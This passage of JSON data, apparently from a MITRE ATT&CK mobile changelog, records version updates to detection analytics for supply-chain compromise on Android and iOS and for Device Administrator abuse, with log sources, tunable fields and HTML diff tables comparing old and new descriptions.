                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Maximum span between app install/update event and first suspicious post-delivery behavior.\"}, {\"field\": \"AllowedAppList\", \"description\": \"Approved apps expected to change permissions, add services, or contact new destinations because of legitimate feature releases.\"}, {\"field\": \"AllowedVersionChangeWindow\", \"description\": \"Grace period after a documented app release during which some behavior drift may be expected.\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether certain behaviors should only be considered suspicious when they occur without visible user interaction.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Threshold for determining whether immediate post-update activity was user-driven or autonomous.\"}, {\"field\": \"DestinationAllowList\", \"description\": \"Expected new destinations, APIs, CDNs, or telemetry endpoints associated with approved app updates.\"}, {\"field\": \"CapabilityDriftThreshold\", \"description\": \"Threshold for how many newly added or newly exercised permissions/capabilities are considered abnormal for a known app.\"}, {\"field\": \"BehaviorBaselinePopulation\", \"description\": \"Population of prior devices, versions, or user cohorts used to baseline normal app behavior.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-12 17:37:17.976000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"An app or app update arrives through an expected delivery path or presents as a known legitimate package identity, but its post-install or post-update behavior materially changes in ways inconsistent with its historical role. The defender correlates package identity and install/update context, newly expanded capability state, changed runtime framework use, new sensor or storage behaviors, and new network destinations shortly after installation or update to identify likely supply-chain compromise rather than ordinary malicious sideloading or unrelated post-compromise activity.\", \"old_value\": \"Usage of insecure or malicious third-party libraries could be detected by application vetting services. Malicious software development tools could be detected by enterprises that deploy endpoint protection software on computers that are used to develop mobile apps. Application vetting could detect the usage of insecure or malicious third-party libraries.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2\", \"name\": \"android:MDMLog\", \"channel\": \"Managed app catalog, enterprise update policy, or trusted distribution posture remains unchanged while a known app exhibits materially different post-update behavior\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Known application or newly updated version declares, gains, or activates expanded storage, sensor, communications, accessibility, or device-management capability inconsistent with prior baseline or app role\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Updated or newly delivered application becomes active, launches background services, or executes shortly after install/update with minimal user interaction inconsistent with baseline\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Known application begins first-seen or expanded use of content providers, account services, accessibility, package services, cryptographic routines, dynamic loading, or other framework interactions after update/install\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to185__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to185__0\"><a href=\"#difflib_chg_to185__top\">t</a></td><td class=\"diff_header\" id=\"from185_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Usage&nbsp;of&nbsp;insecure&nbsp;or&nbsp;malicious&nbsp;third-party&nbsp;libraries&nbsp;could&nbsp;b</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to185__top\">t</a></td><td class=\"diff_header\" id=\"to185_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">An&nbsp;app&nbsp;or&nbsp;app&nbsp;update&nbsp;arrives&nbsp;through&nbsp;an&nbsp;expected&nbsp;delivery&nbsp;pa</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;detected&nbsp;by&nbsp;application&nbsp;vetting&nbsp;services.&nbsp;Malicious&nbsp;softwa</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">th&nbsp;or&nbsp;presents&nbsp;as&nbsp;a&nbsp;known&nbsp;legitimate&nbsp;package&nbsp;identity,&nbsp;but&nbsp;i</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">re&nbsp;development&nbsp;tools&nbsp;could&nbsp;be&nbsp;detected&nbsp;by&nbsp;enterprises&nbsp;that&nbsp;d</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ts&nbsp;post-install&nbsp;or&nbsp;post-update&nbsp;behavior&nbsp;materially&nbsp;changes&nbsp;i</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">eploy&nbsp;endpoint&nbsp;protection&nbsp;software&nbsp;on&nbsp;computers&nbsp;that&nbsp;are&nbsp;use</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;ways&nbsp;inconsistent&nbsp;with&nbsp;its&nbsp;historical&nbsp;role.&nbsp;The&nbsp;defender&nbsp;c</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">d&nbsp;to&nbsp;develop&nbsp;mobile&nbsp;apps.&nbsp;Application&nbsp;vetting&nbsp;could&nbsp;detect&nbsp;t</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">orrelates&nbsp;package&nbsp;identity&nbsp;and&nbsp;install/update&nbsp;context,&nbsp;newly</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">he&nbsp;usage&nbsp;of&nbsp;insecure&nbsp;or&nbsp;malicious&nbsp;third-party&nbsp;libraries.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;expanded&nbsp;capability&nbsp;state,&nbsp;changed&nbsp;runtime&nbsp;framework&nbsp;use,&nbsp;n</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ew&nbsp;sensor&nbsp;or&nbsp;storage&nbsp;behaviors,&nbsp;and&nbsp;new&nbsp;network&nbsp;destinations</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;shortly&nbsp;after&nbsp;installation&nbsp;or&nbsp;update&nbsp;to&nbsp;identify&nbsp;likely&nbsp;sup</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ply-chain&nbsp;compromise&nbsp;rather&nbsp;than&nbsp;ordinary&nbsp;malicious&nbsp;sideload</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ing&nbsp;or&nbsp;unrelated&nbsp;post-compromise&nbsp;activity.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--9aa716a2-0301-49cd-89c0-a441e5da0551",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-13 23:37:57.341000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0628#AN1698",
                            "external_id": "AN1698"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1698",
                    "description": "A managed or supervised app, app update, or enterprise-distributed build retains a legitimate-seeming identity but exhibits post-delivery behavior inconsistent with its expected role, prior version, or distribution context. Because iOS exposes less direct visibility into bundled dependency tampering or component-level supply-chain insertion, the defender prioritizes supervised app inventory, signing/provisioning trust posture, entitlement and behavior drift after update, new sensor/resource use, and new downstream network effects soon after install or version change.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
                            "name": "iOS:MDMLog",
                            "channel": "Managed app distribution, supervised install posture, or provisioning trust context remains expected while a known app exhibits materially different behavior after version change"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "Known application version declares, activates, or exhibits new entitlements, privacy permissions, or capability use inconsistent with prior baseline or business role"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Updated or newly delivered application wakes, foregrounds, refreshes, or becomes active shortly after version change with weak recent user interaction"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Known application begins first-seen or expanded use of protected frameworks, account services, background task APIs, crypto/network service APIs, or other runtime behaviors after update/install"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Maximum span between app install/version change and first suspicious post-delivery behavior."
                        },
                        {
                            "field": "SupervisedOnly",
                            "description": "Whether the analytic should only apply to supervised devices with high-confidence app inventory and managed distribution telemetry."
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Approved apps expected to expand capabilities or contact new destinations because of legitimate releases."
                        },
                        {
                            "field": "AllowedVersionChangeWindow",
                            "description": "Grace period after approved releases during which some behavior drift may be expected."
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether certain behaviors should only be treated as suspicious when they occur without expected visible user interaction."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Threshold for distinguishing autonomous post-update behavior from expected user-driven first-run flows."
                        },
                        {
                            "field": "DestinationAllowList",
                            "description": "Expected new domains, APIs, telemetry services, or CDNs associated with approved app updates."
                        },
                        {
                            "field": "CapabilityDriftThreshold",
                            "description": "Threshold for how much entitlement or capability drift is tolerated for a known app."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Maximum span between app install/version change and first suspicious post-delivery behavior.\"}, {\"field\": \"SupervisedOnly\", \"description\": \"Whether the analytic should only apply to supervised devices with high-confidence app inventory and managed distribution telemetry.\"}, {\"field\": \"AllowedAppList\", \"description\": \"Approved apps expected to expand capabilities or contact new destinations because of legitimate releases.\"}, {\"field\": \"AllowedVersionChangeWindow\", \"description\": \"Grace period after approved releases during which some behavior drift may be expected.\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether certain behaviors should only be treated as suspicious when they occur without expected visible user interaction.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Threshold for distinguishing autonomous post-update behavior from expected user-driven first-run flows.\"}, {\"field\": \"DestinationAllowList\", \"description\": \"Expected new domains, APIs, telemetry services, or CDNs associated with approved app updates.\"}, {\"field\": \"CapabilityDriftThreshold\", \"description\": \"Threshold for how much entitlement or capability drift is tolerated for a known app.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-13 23:37:57.341000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"A managed or supervised app, app update, or enterprise-distributed build retains a legitimate-seeming identity but exhibits post-delivery behavior inconsistent with its expected role, prior version, or distribution context. Because iOS exposes less direct visibility into bundled dependency tampering or component-level supply-chain insertion, the defender prioritizes supervised app inventory, signing/provisioning trust posture, entitlement and behavior drift after update, new sensor/resource use, and new downstream network effects soon after install or version change.\", \"old_value\": \"Usage of insecure or malicious third-party libraries could be detected by application vetting services. Malicious software development tools could be detected by enterprises that deploy endpoint protection software on computers that are used to develop mobile apps. Application vetting could detect the usage of insecure or malicious third-party libraries.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2\", \"name\": \"iOS:MDMLog\", \"channel\": \"Managed app distribution, supervised install posture, or provisioning trust context remains expected while a known app exhibits materially different behavior after version change\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"Known application version declares, activates, or exhibits new entitlements, privacy permissions, or capability use inconsistent with prior baseline or business role\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Updated or newly delivered application wakes, foregrounds, refreshes, or becomes active shortly after version change with weak recent user interaction\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Known application begins first-seen or expanded use of protected frameworks, account services, background task APIs, crypto/network service APIs, or other runtime behaviors after update/install\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to128__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to128__0\"><a href=\"#difflib_chg_to128__top\">t</a></td><td class=\"diff_header\" id=\"from128_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Usage&nbsp;of&nbsp;insecure&nbsp;or&nbsp;malicious&nbsp;third-party&nbsp;libraries&nbsp;could&nbsp;b</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to128__top\">t</a></td><td class=\"diff_header\" id=\"to128_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">A&nbsp;managed&nbsp;or&nbsp;supervised&nbsp;app,&nbsp;app&nbsp;update,&nbsp;or&nbsp;enterprise-distr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;detected&nbsp;by&nbsp;application&nbsp;vetting&nbsp;services.&nbsp;Malicious&nbsp;softwa</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ibuted&nbsp;build&nbsp;retains&nbsp;a&nbsp;legitimate-seeming&nbsp;identity&nbsp;but&nbsp;exhib</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">re&nbsp;development&nbsp;tools&nbsp;could&nbsp;be&nbsp;detected&nbsp;by&nbsp;enterprises&nbsp;that&nbsp;d</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">its&nbsp;post-delivery&nbsp;behavior&nbsp;inconsistent&nbsp;with&nbsp;its&nbsp;expected&nbsp;ro</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">eploy&nbsp;endpoint&nbsp;protection&nbsp;software&nbsp;on&nbsp;computers&nbsp;that&nbsp;are&nbsp;use</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">le,&nbsp;prior&nbsp;version,&nbsp;or&nbsp;distribution&nbsp;context.&nbsp;Because&nbsp;iOS&nbsp;expo</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">d&nbsp;to&nbsp;develop&nbsp;mobile&nbsp;apps.&nbsp;Application&nbsp;vetting&nbsp;could&nbsp;detect&nbsp;t</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ses&nbsp;less&nbsp;direct&nbsp;visibility&nbsp;into&nbsp;bundled&nbsp;dependency&nbsp;tampering</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">he&nbsp;usage&nbsp;of&nbsp;insecure&nbsp;or&nbsp;malicious&nbsp;third-party&nbsp;libraries.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;or&nbsp;component-level&nbsp;supply-chain&nbsp;insertion,&nbsp;the&nbsp;defender&nbsp;pri</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">oritizes&nbsp;supervised&nbsp;app&nbsp;inventory,&nbsp;signing/provisioning&nbsp;trus</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">t&nbsp;posture,&nbsp;entitlement&nbsp;and&nbsp;behavior&nbsp;drift&nbsp;after&nbsp;update,&nbsp;new&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">sensor/resource&nbsp;use,&nbsp;and&nbsp;new&nbsp;downstream&nbsp;network&nbsp;effects&nbsp;soon</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;after&nbsp;install&nbsp;or&nbsp;version&nbsp;change.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--6852479f-7c3d-4c69-82b9-b5b9976e4101",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-13 18:17:45.586000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0630#AN1701",
                            "external_id": "AN1701"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1701",
                    "description": "Correlates (1) activation of Device Administrator privileges by an application, (2) absence or mismatch of legitimate user interaction during the approval flow, and (3) immediate execution of administrator-level control actions (e.g., password reset, device lock, policy enforcement, prevention of uninstall). The defender observes a causal chain where an application transitions into a privileged device control role and rapidly exercises those capabilities outside expected user-driven patterns.\n\nApplication vetting services can check for the string `BIND_DEVICE_ADMIN` in the application\u2019s manifest. ",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes DevicePolicyManager APIs (e.g., resetPassword, lockNow, setCameraDisabled) immediately following admin activation"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "application granted Device Administrator privilege + abnormal activation pattern (e.g., rapid enablement after install or no recent user interaction)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Defines correlation window between Device Admin activation and subsequent privileged actions"
                        },
                        {
                            "field": "AllowedAdminApps",
                            "description": "Baseline of legitimate applications expected to request Device Administrator privileges (e.g., enterprise MDM agents)"
                        },
                        {
                            "field": "UserInteractionThreshold",
                            "description": "Defines acceptable timing between user interaction and admin activation"
                        },
                        {
                            "field": "PrivilegedActionSet",
                            "description": "List of high-risk DevicePolicyManager API actions monitored for abuse"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Defines correlation window between Device Admin activation and subsequent privileged actions\"}, {\"field\": \"AllowedAdminApps\", \"description\": \"Baseline of legitimate applications expected to request Device Administrator privileges (e.g., enterprise MDM agents)\"}, {\"field\": \"UserInteractionThreshold\", \"description\": \"Defines acceptable timing between user interaction and admin activation\"}, {\"field\": \"PrivilegedActionSet\", \"description\": \"List of high-risk DevicePolicyManager API actions monitored for abuse\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-13 18:17:45.586000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) activation of Device Administrator privileges by an application, (2) absence or mismatch of legitimate user interaction during the approval flow, and (3) immediate execution of administrator-level control actions (e.g., password reset, device lock, policy enforcement, prevention of uninstall). The defender observes a causal chain where an application transitions into a privileged device control role and rapidly exercises those capabilities outside expected user-driven patterns.\\n\\nApplication vetting services can check for the string `BIND_DEVICE_ADMIN` in the application\\u2019s manifest. \", \"old_value\": \"The user is prompted for approval when an application requests device administrator permissions.\\nApplication vetting services can check for the string `BIND_DEVICE_ADMIN` in the application\\u2019s manifest. This indicates it can prompt the user for device administrator permissions.\\nThe user can see which applications are registered as device administrators in the device settings.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n-The user is prompted for approval when an application requests device administrator permissions.\\n-Application vetting services can check for the string `BIND_DEVICE_ADMIN` in the application\\u2019s manifest. This indicates it can prompt the user for device administrator permissions.\\n-The user can see which applications are registered as device administrators in the device settings.\\n+Correlates (1) activation of Device Administrator privileges by an application, (2) absence or mismatch of legitimate user interaction during the approval flow, and (3) immediate execution of administrator-level control actions (e.g., password reset, device lock, policy enforcement, prevention of uninstall). The defender observes a causal chain where an application transitions into a privileged device control role and rapidly exercises those capabilities outside expected user-driven patterns.\\n+\\n+Application vetting services can check for the string `BIND_DEVICE_ADMIN` in the application\\u2019s manifest. \"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes DevicePolicyManager APIs (e.g., resetPassword, lockNow, setCameraDisabled) immediately following admin activation\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--e2f72131-14d1-411f-8e8c-aa3453dd5456\", \"name\": \"User Interface\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"application granted Device Administrator privilege + abnormal activation pattern (e.g., rapid enablement after install or no recent user interaction)\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_removed\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to83__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to83__0\"><a href=\"#difflib_chg_to83__top\">t</a></td><td class=\"diff_header\" id=\"from83_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">The&nbsp;user&nbsp;is&nbsp;prompted&nbsp;for&nbsp;approval&nbsp;when&nbsp;an&nbsp;application&nbsp;reques</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to83__top\">t</a></td><td class=\"diff_header\" id=\"to83_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;activation&nbsp;of&nbsp;Device&nbsp;Administrator&nbsp;privileges</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ts&nbsp;device&nbsp;administrator&nbsp;permissions.&nbsp;Application&nbsp;vetting&nbsp;ser</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;by&nbsp;an&nbsp;application,&nbsp;(2)&nbsp;absence&nbsp;or&nbsp;mismatch&nbsp;of&nbsp;legitimate&nbsp;us</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">vices&nbsp;can&nbsp;check&nbsp;for&nbsp;the&nbsp;string&nbsp;`BIND_DEVICE_ADMIN`&nbsp;in&nbsp;the&nbsp;ap</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">er&nbsp;interaction&nbsp;during&nbsp;the&nbsp;approval&nbsp;flow,&nbsp;and&nbsp;(3)&nbsp;immediate&nbsp;e</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">plication\u2019s&nbsp;manifest.&nbsp;This&nbsp;indicates&nbsp;it&nbsp;can&nbsp;prompt&nbsp;the&nbsp;user&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">xecution&nbsp;of&nbsp;administrator-level&nbsp;control&nbsp;actions&nbsp;(e.g.,&nbsp;passw</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td 